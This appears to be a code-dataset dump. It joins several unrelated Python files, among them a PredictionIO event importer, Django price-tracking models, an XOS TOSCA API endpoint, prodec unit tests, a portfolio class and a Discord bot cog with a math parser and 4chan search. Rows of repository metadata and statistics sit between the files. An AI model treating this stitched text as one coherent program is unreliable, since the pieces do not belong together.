for viewed_item in random.sample(item_ids, 10):
if (random.randint(0, 1) == 1):
print "User", user_id ,"rates item", viewed_item
client.create_event(
event="rate",
entity_type="user",
entity_id=user_id,
target_entity_type="item",
                    target_entity_id=viewed_item,
properties= { "rating" : float(random.randint(1, 6)) }
)
else:
print "User", user_id ,"buys item", viewed_item
client.create_event(
event="buy",
entity_type="user",
entity_id=user_id,
target_entity_type="item",
                    target_entity_id=viewed_item
)
count += 1
print "%s events are imported." % count
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Import sample data for recommendation engine")
parser.add_argument('--access_key', default='invald_access_key')
parser.add_argument('--url', default="http://localhost:7070")
args = parser.parse_args()
print args
client = predictionio.EventClient(
access_key=args.access_key,
url=args.url,
threads=5,
qsize=500)
import_events(client)
| 29.546296 | 74 | 0.651833 | 432 | 3,191 | 4.675926 | 0.395833 | 0.023762 | 0.033663 | 0.043564 | 0.237624 | 0.220792 | 0.164356 | 0.10396 | 0.067327 | 0.067327 | 0 | 0.025841 | 0.235976 | 3,191 | 107 | 75 | 29.82243 | 0.802707 | 0.291758 | 0 | 0.291667 | 0 | 0 | 0.135865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.097222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57b0f06734d5293b4bc104ab02dc176064141a7e | 4,137 | py | Python | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | null | null | null | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | null | null | null | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | 1 | 2020-03-03T04:04:56.000Z | 2020-03-03T04:04:56.000Z | from django.core.exceptions import ValidationError
from django.db import models
from django.forms.models import model_to_dict
from decimal import Decimal
# Create your models here.
class ProductManager(models.Manager):
def top_drops(self, n):
return self.get_queryset().order_by('-price_drop')[:n]
def top_clicks(self, n):
return self.get_queryset().annotate(clicks=models.Count('clicklog')).order_by('-clicks')[:n]
class Product(models.Model):
pid = models.IntegerField(primary_key=True, verbose_name="Product ID") # generated using murmur3 on url
url = models.URLField(max_length=2000, verbose_name="Product URL")
img = models.URLField(max_length=2000, verbose_name="Product Image")
headline = models.CharField(max_length=256)
vendor = models.CharField(max_length=128)
price = models.DecimalField(max_digits=9, decimal_places=2, verbose_name="Product Price")
price_drop = models.IntegerField(verbose_name="Product Price Drop Percentage",
db_index=True, default=0)
oos = models.BooleanField(default=False, verbose_name="Product Out of Stock")
last_modified = models.DateTimeField(verbose_name="Last modified time")
objects = ProductManager()
def clean(self):
if self.price < 0.0:
raise ValidationError('Price cannot be negative')
if self.price_drop < 0 or self.price_drop > 100:
raise ValidationError('Price drop out of range of 0-100%')
def __str__(self):
return self.headline
# only save if price changes
def save(self, **kwargs):
if Product.objects.filter(pid=self.pid).exists():
current = Product.objects.get(pid=self.pid)
dict_new = model_to_dict(self)
dict_current = model_to_dict(current)
diff = filter(lambda (k, v): v != dict_new[k] and k != 'last_modified' and k != 'price', dict_current.items())
new_price = Decimal("%.2f" % self.price)
self.price = new_price
if current.price != new_price:
if current.price > new_price:
self.price_drop = int((current.price - new_price) / current.price * 100)
else:
self.price_drop = 0
diff.append('price')
if len(diff) > 0:
self.clean()
super(Product, self).save(**kwargs)
else:
self.price = Decimal("%.2f" % self.price)
self.clean()
super(Product, self).save(**kwargs)
class Meta:
verbose_name = "Product"
class PriceHistoryManager(models.Manager):
def price_history(self, product):
return self.get_queryset().filter(product__pid=product.pid).order_by('timestamp')
def min(self, product):
min_price = self.get_queryset().filter(product__pid=product.pid).aggregate(min_price=models.Min('price'))['min_price']
return self.get_queryset().filter(product__pid=product.pid).filter(price=min_price).order_by('-timestamp')[0]
def max(self, product):
max_price = self.get_queryset().filter(product__pid=product.pid).aggregate(max_price=models.Max('price'))['max_price']
return self.get_queryset().filter(product__pid=product.pid).filter(price=max_price).order_by('-timestamp')[0]
def last_n(self, product, n):
return self.get_queryset().filter(product__pid=product.pid).order_by('-timestamp')[:n]
class PriceHistory(models.Model):
product = models.ForeignKey(Product)
price = models.DecimalField(max_digits=9, decimal_places=2, verbose_name="Product Price")
timestamp = models.DateTimeField()
objects = PriceHistoryManager()
class Meta:
verbose_name = "Price History"
class ClickLogManager(models.Manager):
def expired(self, cutoff_time):
return self.get_queryset().filter(timestamp__lt = cutoff_time)
class ClickLog(models.Model):
product = models.ForeignKey(Product, db_index=False)
timestamp = models.DateTimeField()
objects = ClickLogManager()
class Meta:
verbose_name = "Price Check Log"
# --- xos/api/utility/toscaapi.py (repo: iecedge/xos, license: Apache-2.0) ---

# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import traceback

from rest_framework.response import Response

# XOSViewSet is defined in the XOS API helpers; the exact import path is
# assumed from the surrounding XOS source tree.
from api.xosapi_helpers import XOSViewSet
# The Tosca engine expects to be run from /opt/xos/tosca/ or equivalent. It
# needs some sys.path fixing up.
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
toscadir = os.path.join(currentdir, "../../tosca")
class ToscaViewSet(XOSViewSet):
base_name = "tosca"
method_name = "tosca"
method_kind = "viewset"
@classmethod
def get_urlpatterns(self, api_path="^"):
patterns = []
patterns.append(self.list_url("run/$", {"post": "post_run"}, "tosca_run"))
return patterns
def post_run(self, request):
recipe = request.data.get("recipe", None)
sys_path_save = sys.path
try:
sys.path.append(toscadir)
from tosca.engine import XOSTosca
xt = XOSTosca(recipe, parent_dir=toscadir, log_to_console=False)
xt.execute(request.user)
except BaseException:
return Response({"error_text": traceback.format_exc()}, status=500)
finally:
sys.path = sys_path_save
        return Response({"log_msgs": xt.log_msgs})
| 30.983607 | 86 | 0.679894 | 250 | 1,890 | 5.052 | 0.576 | 0.047506 | 0.020586 | 0.025337 | 0.047506 | 0.047506 | 0.047506 | 0 | 0 | 0 | 0 | 0.013369 | 0.208466 | 1,890 | 60 | 87 | 31.5 | 0.830882 | 0.355556 | 0 | 0.0625 | 0 | 0 | 0.072379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.15625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57b8a501dc93a41633bfea6eb1b0e55e7388ace2 | 4,041 | py | Python | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for Descriptor."""
import unittest
import numpy as np
import orjson
from prodec import Descriptor
from prodec.utils import std_amino_acids
from tests.constants import *
class TestDescriptor(unittest.TestCase):
"""Tests for Descriptor."""
def setUp(self):
"""Create custom descriptor for testing"""
# Values below obtained at random
self.replacements = {'A': [6.0, 3.0, 12.1], 'C': [120.6, -12.2, -0.0001],
'D': [-3.8, 2.1, 0.9], 'E': [-91.24, -82.82, 77.79 ],
'F': [0.12, 3.0, 4.0], 'G': [-77.87, -75.44, 30.11 ],
'H': [47.73, -77.07, -34.83], 'I': [14.22, 97.13, -87.40 ],
'K': [ 64.98, 48.73, -62.02], 'L': [-13.98, -31.64, 5.04 ],
'M': [-78.57, -90.04, 17.60], 'N': [ -83.47, -58.43, -21.13 ],
'P': [-52.18, 52.58, 74.57], 'Q': [-36.21, -62.56, -56.08 ],
'R': [ 86.56, 26.16, 69.17], 'S': [34.89, -87.35, 37.82 ],
'T': [-13.67, -93.15, -2.88], 'V': [68.36, 67.60, -66.56 ],
'W': [-48.21, -42.47, -84.41], 'Y': [-90.24, 44.75, 2.18 ]}
self.definition = CSTM_DATA_NULL
for aa in std_amino_acids:
self.definition = self.definition.replace(f'{aa}_value', f'"{aa}" : {self.replacements[aa]}')
self.desc = Descriptor(orjson.loads(self.definition))
def test_descriptor_loaded_ID(self):
self.assertEqual(self.desc.ID, 'CSTM_TESTS')
def test_descriptor_loaded_Type(self):
self.assertEqual(self.desc.Type, 'Linear')
def test_descriptor_loaded_Name(self):
self.assertEqual(self.desc.Name, 'TEST')
def test_descriptor_summary(self):
        self.assertEqual(self.desc.summary, {'Authors': None, 'Year': None,
                                             'Journal': None, 'DOI': None,
                                             'PMID': None, 'Patent': None})
def test_descriptor_loaded_Scales_Names_type(self):
self.assertIsInstance(self.desc.Scales_names, list)
def test_descriptor_loaded_Scales_Names(self):
self.assertListEqual(self.desc.Scales_names, [ 'v1', 'v2', 'v3' ])
def test_descriptor_definition(self):
self.assertEqual(self.desc.definition, self.replacements)
def test_descriptor_is_sequence_valid_default(self):
self.assertTrue(self.desc.is_sequence_valid(DFLT_SEQ))
def test_descriptor_is_sequence_valid_stupid(self):
self.assertFalse(self.desc.is_sequence_valid(STUPID_SEQ))
def test_descriptor_get_flattened_type(self):
result = self.desc.get(DFLT_SEQ, True, 0)
self.assertIsInstance(result, list)
def test_descriptor_get_not_flattened_type(self):
result = self.desc.get(DFLT_SEQ, False, 0)
self.assertIsInstance(result, list)
def test_descriptor_get_flattened_shape(self):
result = np.array(self.desc.get(DFLT_SEQ, True, 0)).shape
self.assertEqual(result[0], 3 * len(DFLT_SEQ))
    def test_descriptor_get_not_flattened_shape(self):
result = np.array(self.desc.get(DFLT_SEQ, False, 0)).shape
self.assertTrue(result[0] == len(DFLT_SEQ) and result[1] == 3)
def test_descriptor_get_flattened_value(self):
result = self.desc.get(DFLT_SEQ, True, 0)
self.assertAlmostEqual(np.mean(result), -9.968835, 6)
self.assertAlmostEqual(np.sum(result), -598.1301, 4)
self.assertAlmostEqual(np.std(result), 56.753686, 6)
def test_descriptor_get_not_flattened_value(self):
        result = self.desc.get(DFLT_SEQ, False, 0)
self.assertAlmostEqual(np.mean(result), -9.968835, 6)
self.assertAlmostEqual(np.sum(result), -598.1301, 4)
self.assertAlmostEqual(np.std(result), 56.753686, 6)
def test_descriptor_get_empty_value(self):
result = self.desc.get('', True, 0)
self.assertListEqual(result, []) | 42.536842 | 105 | 0.59218 | 548 | 4,041 | 4.208029 | 0.332117 | 0.058977 | 0.117953 | 0.060711 | 0.476583 | 0.369471 | 0.299653 | 0.292715 | 0.292715 | 0.179965 | 0 | 0.095033 | 0.25266 | 4,041 | 95 | 106 | 42.536842 | 0.668543 | 0.033408 | 0 | 0.19403 | 0 | 0 | 0.030591 | 0.005913 | 0 | 0 | 0 | 0 | 0.298507 | 1 | 0.253731 | false | 0 | 0.089552 | 0 | 0.358209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c14c8998061fad84c8b010eef9803262de092d | 328 | py | Python | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | 28 | 2020-09-08T04:38:01.000Z | 2022-02-05T21:47:52.000Z | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | 8 | 2020-09-04T21:29:57.000Z | 2021-11-17T16:44:42.000Z | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
import pytest
@pytest.fixture
def dta():
return pd.DataFrame.from_dict(
{
'A': np.arange(1, 16),
'B': pd.date_range('2020-01-01', periods=15),
'C': ['A', 'B', 'C'] * 5,
'D': pd.Categorical(['A', 'B', 'C'] * 5),
}
)
| 20.5 | 57 | 0.466463 | 45 | 328 | 3.355556 | 0.644444 | 0.02649 | 0.039735 | 0.05298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068807 | 0.335366 | 328 | 15 | 58 | 21.866667 | 0.623853 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | true | 0 | 0.230769 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c4c8bc27d5ede3ee5ab749d40ffd70c1be34a7 | 1,474 | py | Python | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | from .stock import Stock
class Portfolio:
def __init__(self, assets):
self.stocks = []
self.__populate_stocks(assets)
def get_stock(self, stock_name):
for stock in self.stocks:
if stock.name == stock_name:
return stock
return None
def get_profit(self, start_date, end_date):
initial_value = 0
final_value = 0
for stock in self.stocks:
initial_value += stock.get_price_from_date(start_date)
final_value += stock.get_price_from_date(end_date)
return self.__calculate_annualized_return(initial_value, final_value)
def add_stock(self, stock_name, stock_id):
self.stocks.append(Stock(stock_name, stock_id))
def remove_stock(self, stock_name):
for stock in self.stocks:
if stock.name == stock_name:
self.stocks.remove(stock)
def toggle_stock(self, stock_name, stock_id):
stock = self.get_stock(stock_name)
if stock is not None:
self.remove_stock(stock_name)
else:
self.add_stock(stock_name, stock_id)
def __populate_stocks(self, assets):
for asset in assets:
self.stocks.append(Stock(asset["name"], asset["id"]))
    # Note: despite its name, this computes the simple (not annualized)
    # percentage return over the period.
    def __calculate_annualized_return(self, initial_value, final_value):
        try:
            return (final_value - initial_value) / initial_value * 100
        except ZeroDivisionError:
            return 0
| 28.901961 | 77 | 0.627544 | 188 | 1,474 | 4.595745 | 0.218085 | 0.125 | 0.097222 | 0.083333 | 0.331019 | 0.30787 | 0.134259 | 0.134259 | 0.134259 | 0.134259 | 0 | 0.005731 | 0.289688 | 1,474 | 50 | 78 | 29.48 | 0.819484 | 0 | 0 | 0.135135 | 0 | 0 | 0.004071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0 | 0.027027 | 0 | 0.405405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c8b90994148c8460b99ab3bc8d5a19736e8281 | 25,325 | py | Python | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import asyncio
import aiohttp
import random
from datetime import datetime, timedelta
import math
import json
# #####################################################################################
# math parser used by $calc
class MathParser:
def __init__(self):
self.expression = ""
self.index = 0
self.vars = {}
self.funcs = ['cos', 'sin', 'tan', 'acos', 'asin', 'atan', 'cosh', 'sinh', 'tanh', 'acosh', 'asinh', 'atanh', 'exp', 'ceil', 'abs', 'factorial', 'floor', 'round', 'trunc', 'log', 'log2', 'log10', 'sqrt', 'rad', 'deg']
def evaluate(self, expression = "", vars={}):
self.expression = expression.replace(' ', '').replace('\t', '').replace('\n', '').replace('\r', '')
self.index = 0
self.vars = {
'pi' : 3.141592653589793,
'e' : 2.718281828459045
}
self.vars = {**self.vars, **vars}
for func in self.funcs:
if func in self.vars: raise Exception("Variable name '{}' can't be used".format(func))
value = float(self.parse())
if self.isNotDone(): raise Exception("Unexpected character '{}' found at index {}".format(self.peek(), self.index))
epsilon = 0.0000000001
if int(value) == value: return int(value)
elif int(value + epsilon) != int(value):
return int(value + epsilon)
elif int(value - epsilon) != int(value):
return int(value)
return value
def isNotDone(self):
return self.index < len(self.expression)
def peek(self):
return self.expression[self.index:self.index + 1]
def parse(self):
values = [self.multiply()]
while True:
c = self.peek()
if c in ['+', '-']:
self.index += 1
if c == '-': values.append(- self.multiply())
else: values.append(self.multiply())
else:
break
return sum(values)
def multiply(self):
values = [self.parenthesis()]
while True:
c = self.peek()
if c in ['*', 'x']:
self.index += 1
values.append(self.parenthesis())
elif c in ['/', '%']:
div_index = self.index
self.index += 1
denominator = self.parenthesis()
if denominator == 0:
raise Exception("Division by 0 occured at index {}".format(div_index))
                if c == '/': values.append(1.0 / denominator)
                # Modulo must apply to the preceding factor, not to its reciprocal
                else: values[-1] = values[-1] % denominator
elif c == '^':
self.index += 1
exponent = self.parenthesis()
values[-1] = values[-1] ** exponent
elif c == '!':
self.index += 1
values[-1] = math.factorial(values[-1])
else:
break
value = 1.0
for factor in values: value *= factor
return value
def parenthesis(self):
if self.peek() == '(':
self.index += 1
value = self.parse()
if self.peek() != ')': raise Exception("No closing parenthesis found at character {}".format(self.index))
self.index += 1
return value
else:
return self.negative()
def negative(self):
if self.peek() == '-':
self.index += 1
return -1 * self.parenthesis()
else:
return self.value()
def value(self):
if self.peek() in '0123456789.':
return self.number()
else:
return self.variable_or_function()
def variable_or_function(self):
var = ''
while self.isNotDone():
c = self.peek()
if c.lower() in '_abcdefghijklmnopqrstuvwxyz0123456789':
var += c
self.index += 1
else:
break
value = self.vars.get(var, None)
if value == None:
if var not in self.funcs: raise Exception("Unrecognized variable '{}'".format(var))
else:
param = self.parenthesis()
if var == 'cos': value = math.cos(param)
elif var == 'sin': value = math.sin(param)
elif var == 'tan': value = math.tan(param)
elif var == 'acos': value = math.acos(param)
elif var == 'asin': value = math.asin(param)
elif var == 'atan': value = math.atan(param)
elif var == 'cosh': value = math.cosh(param)
elif var == 'sinh': value = math.sinh(param)
elif var == 'tanh': value = math.tanh(param)
elif var == 'acosh': value = math.acosh(param)
elif var == 'asinh': value = math.asinh(param)
elif var == 'atanh': value = math.atanh(param)
elif var == 'exp': value = math.exp(param)
elif var == 'ceil': value = math.ceil(param)
elif var == 'floor': value = math.floor(param)
            elif var == 'round': value = round(param)
elif var == 'factorial': value = math.factorial(param)
elif var == 'abs': value = math.fabs(param)
elif var == 'trunc': value = math.trunc(param)
elif var == 'log':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log(param)
elif var == 'log2':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log2(param)
elif var == 'log10':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log10(param)
elif var == 'sqrt': value = math.sqrt(param)
elif var == 'rad': value = math.radians(param)
elif var == 'deg': value = math.degrees(param)
else: raise Exception("Unrecognized function '{}'".format(var))
return float(value)
def number(self):
strValue = ''
decimal_found = False
c = ''
while self.isNotDone():
c = self.peek()
if c == '.':
if decimal_found:
raise Exception("Found an extra period in a number at character {}".format(self.index))
decimal_found = True
strValue += '.'
elif c in '0123456789':
strValue += c
else:
break
self.index += 1
if len(strValue) == 0:
if c == '': raise Exception("Unexpected end found")
            else: raise Exception("A number was expected at character {} but instead '{}' was found".format(self.index, c))
return float(strValue)
# #####################################################################################
# Cogs
class General(commands.Cog):
"""General commands."""
def __init__(self, bot):
self.bot = bot
self.color = 0x8fe3e8
def startTasks(self):
self.bot.runTask('reminder', self.remindertask)
async def remindertask(self):
while True:
if self.bot.exit_flag: return
try:
c = self.bot.getJST() + timedelta(seconds=30)
for r in list(self.bot.reminders.keys()):
di = 0
u = self.bot.get_user(int(r))
if u is None: continue
while di < len(self.bot.reminders[r]):
if c > self.bot.reminders[r][di][0]:
try:
await u.send(embed=self.bot.buildEmbed(title="Reminder", description=self.bot.reminders[r][di][1]))
except Exception as e:
await self.bot.sendError('remindertask', "User: {}\nReminder: {}\nError: {}".format(u.name, self.bot.reminders[r][di][1], e))
self.bot.reminders[r].pop(di)
self.bot.savePending = True
else:
di += 1
if len(self.bot.reminders[r]) == 0:
self.bot.reminders.pop(r)
self.bot.savePending = True
except asyncio.CancelledError:
await self.bot.sendError('remindertask', 'cancelled')
return
except Exception as e:
await self.bot.sendError('remindertask', str(e))
await asyncio.sleep(200)
await asyncio.sleep(40)
def isDisabled(): # for decorators
async def predicate(ctx):
return False
return commands.check(predicate)
def isAuthorized(): # for decorators
async def predicate(ctx):
return ctx.bot.isAuthorized(ctx)
return commands.check(predicate)
# get a 4chan thread
async def get4chan(self, board : str, search : str): # be sure to not abuse it, you are not supposed to call the api more than once per second
try:
search = search.lower()
url = 'http://a.4cdn.org/{}/catalog.json'.format(board) # board catalog url
async with aiohttp.ClientSession() as session:
async with session.get(url) as r:
if r.status == 200:
data = await r.json()
threads = []
for p in data:
for t in p["threads"]:
try:
if t["sub"].lower().find(search) != -1 or t["com"].lower().find(search) != -1:
threads.append([t["no"], t["replies"]]) # store the thread ids matching our search word
except:
pass
threads.sort(reverse=True)
return threads
except:
return []
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
async def roll(self, ctx, dice : str = ""):
"""Rolls a dice in NdN format."""
try:
rolls, limit = map(int, dice.split('d'))
result = ", ".join(str(random.randint(1, limit)) for r in range(rolls))
await ctx.send(embed=self.bot.buildEmbed(title="{}'s dice Roll(s)".format(ctx.message.author.display_name), description=result, color=self.color))
except:
await ctx.send(embed=self.bot.buildEmbed(title="Format has to be in NdN", footer="example: roll 2d6", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['choice'])
@isAuthorized()
@commands.cooldown(2, 10, commands.BucketType.guild)
async def choose(self, ctx, *, choices : str ):
"""Chooses between multiple choices.
Use quotes if one of your choices contains spaces.
Example: $choose I'm Alice ; Bob"""
try:
possible = choices.split(";")
if len(possible) < 2: raise Exception()
await ctx.send(embed=self.bot.buildEmbed(title="{}, I choose".format(ctx.message.author.display_name), description=random.choice(possible), color=self.color))
except:
await ctx.send(embed=self.bot.buildEmbed(title="Give me a list of something to choose from 😔, separated by ';'", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['math'])
@commands.cooldown(2, 10, commands.BucketType.guild)
async def calc(self, ctx, *terms : str):
"""Process a mathematical expression
You can define a variable by separating using a comma.
Some functions are also available.
Example: cos(a + b) / c, a = 1, b=2,c = 3"""
try:
m = " ".join(terms).split(",")
d = {}
for i in range(1, len(m)): # process the variables if any
x = m[i].replace(" ", "").split("=")
if len(x) == 2: d[x[0]] = float(x[1])
else: raise Exception('')
msg = "{} = **{}**".format(m[0], MathParser().evaluate(m[0], d))
if len(d) > 0:
msg += "\nwith:\n"
for k in d:
msg += "{} = {}\n".format(k, d[k])
await ctx.send(embed=self.bot.buildEmbed(title="Calculator", description=msg, color=self.color))
except Exception as e:
await ctx.send(embed=self.bot.buildEmbed(title="Error", description=str(e), color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True)
@commands.cooldown(1, 5, commands.BucketType.guild)
async def jst(self, ctx):
"""Post the current time, JST timezone"""
await ctx.send(embed=self.bot.buildEmbed(title="{} {:%Y/%m/%d %H:%M} JST".format(self.bot.getEmote('clock'), self.bot.getJST()), color=self.color))
    @commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['inrole', 'rolestat'])
@isAuthorized()
async def roleStats(self, ctx, *name : str):
"""Search how many users have a matching role
use quotes if your match contain spaces
add 'exact' at the end to force an exact match"""
g = ctx.author.guild
i = 0
if len(name) > 0 and name[-1] == "exact":
exact = True
name = name[:-1]
else:
exact = False
name = ' '.join(name)
for member in g.members:
for r in member.roles:
if r.name == name or (exact == False and r.name.lower().find(name.lower()) != -1):
i += 1
        if not exact:
await ctx.send(embed=self.bot.buildEmbed(title="Roles containing: {}".format(name), description="{} user(s)".format(i), thumbnail=g.icon_url, footer="on server {}".format(g.name), color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="Roles matching: {}".format(name), description="{} user(s)".format(i), thumbnail=g.icon_url, footer="on server {}".format(g.name), color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['hgg2d'])
@commands.cooldown(1, 10, commands.BucketType.default)
async def hgg(self, ctx):
"""Post the latest /hgg2d/ threads"""
if not ctx.channel.is_nsfw():
await ctx.send(embed=self.bot.buildEmbed(title=':underage: NSFW channels only'))
return
threads = await self.get4chan('vg', '/hgg2d/')
if len(threads) > 0:
msg = ""
for t in threads:
msg += '🔞 https://boards.4channel.org/vg/thread/{} ▫️ *{} replies*\n'.format(t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="/hgg2d/ latest thread(s)", description=msg, footer="Good fap, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="/hgg2d/ Error", description="I couldn't find a single /hgg2d/ thread 😔", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['thread'])
@commands.cooldown(1, 3, commands.BucketType.default)
async def gbfg(self, ctx):
"""Post the latest /gbfg/ threads"""
threads = await self.get4chan('vg', '/gbfg/')
if len(threads) > 0:
msg = ""
for t in threads:
msg += ':poop: https://boards.4channel.org/vg/thread/{} ▫️ *{} replies*\n'.format(t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="/gbfg/ latest thread(s)", description=msg, footer="Have fun, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="/gbfg/ Error", description="I couldn't find a single /gbfg/ thread 😔", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, name='4chan')
@commands.cooldown(1, 3, commands.BucketType.default)
async def _4chan(self, ctx, board : str, *, term : str):
"""Search 4chan threads"""
nsfw = ['b', 'r9k', 'pol', 'bant', 'soc', 's4s', 's', 'hc', 'hm', 'h', 'e', 'u', 'd', 'y', 't', 'hr', 'gif', 'aco', 'r']
board = board.lower()
if board in nsfw and not ctx.channel.is_nsfw():
await ctx.send(embed=self.bot.buildEmbed(title=":underage: The board `{}` is restricted to NSFW channels".format(board)))
return
threads = await self.get4chan(board, term)
if len(threads) > 0:
msg = ""
for t in threads:
msg += ':four_leaf_clover: https://boards.4channel.org/{}/thread/{} ▫️ *{} replies*\n'.format(board, t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="4chan Search result", description=msg, footer="Have fun, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="4chan Search result", description="No matching threads found", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['reminder'])
@commands.cooldown(1, 3, commands.BucketType.user)
async def remind(self, ctx, duration : str, *, msg : str):
"""Remind you of something at the specified time (±30 seconds precision)
<duration> format: XdXhXmXs for day, hour, minute, second, each are optionals"""
id = str(ctx.author.id)
if id not in self.bot.reminders:
self.bot.reminders[id] = []
if len(self.bot.reminders[id]) >= 5 and ctx.author.id != self.bot.ids.get('owner', -1):
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Sorry, I'm limited to 5 reminders per user 🙇", color=self.color))
return
try:
d = self.bot.makeTimedelta(duration)
if d is None: raise Exception()
except:
            await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Invalid duration string `{}`, format is `NdNhNmNs`".format(duration), color=self.color))
return
if msg == "":
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Tell me what I'm supposed to remind you 🤔", color=self.color))
return
if len(msg) > 200:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Reminders are limited to 200 characters", color=self.color))
return
try:
self.bot.reminders[id].append([datetime.utcnow().replace(microsecond=0) + timedelta(seconds=32400) + d, msg]) # keep JST
self.bot.savePending = True
await ctx.message.add_reaction('✅') # white check mark
except:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", footer="I have no clues about what went wrong", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['rl', 'reminderlist'])
